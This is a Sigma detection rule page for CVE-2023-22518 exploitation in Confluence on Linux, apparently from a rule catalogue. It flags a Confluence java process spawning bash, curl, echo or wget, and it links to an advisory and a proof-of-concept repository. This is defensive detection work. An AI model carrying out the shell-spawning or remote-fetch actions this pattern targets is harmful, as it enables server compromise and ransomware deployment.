CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
Sigma rule (View on GitHub)
1title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
2id: f8987c03-4290-4c96-870f-55e75ee377f4
3related:
4 - id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db
5 type: similar
6status: experimental
7description: |
8 Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
9references:
10 - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html
11 - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment
12 - https://github.com/ForceFledgling/CVE-2023-22518
13author: Andreas Braathen (mnemonic.io)
14date: 2023-11-14
15tags:
16 - detection.emerging-threats
17 - attack.execution
18 - attack.t1059
19 - attack.initial-access
20 - attack.t1190
21 - cve.2023-22518
22logsource:
23 category: process_creation
24 product: linux
25detection:
26 selection_parent:
27 ParentImage|endswith: '/java'
28 ParentCommandLine|contains: 'confluence'
29 selection_child:
30 # Only children associated with known campaigns
31 Image|endswith:
32 - '/bash'
33 - '/curl'
34 - '/echo'
35 - '/wget'
36 filter_main_ulimit:
37 CommandLine|contains: 'ulimit -u'
38 condition: all of selection_* and not 1 of filter_main_*
39falsepositives:
40 - Unlikely
41level: high
References
Related rules
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
- Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
- Atlassian Confluence CVE-2022-26134
- CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)
- CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)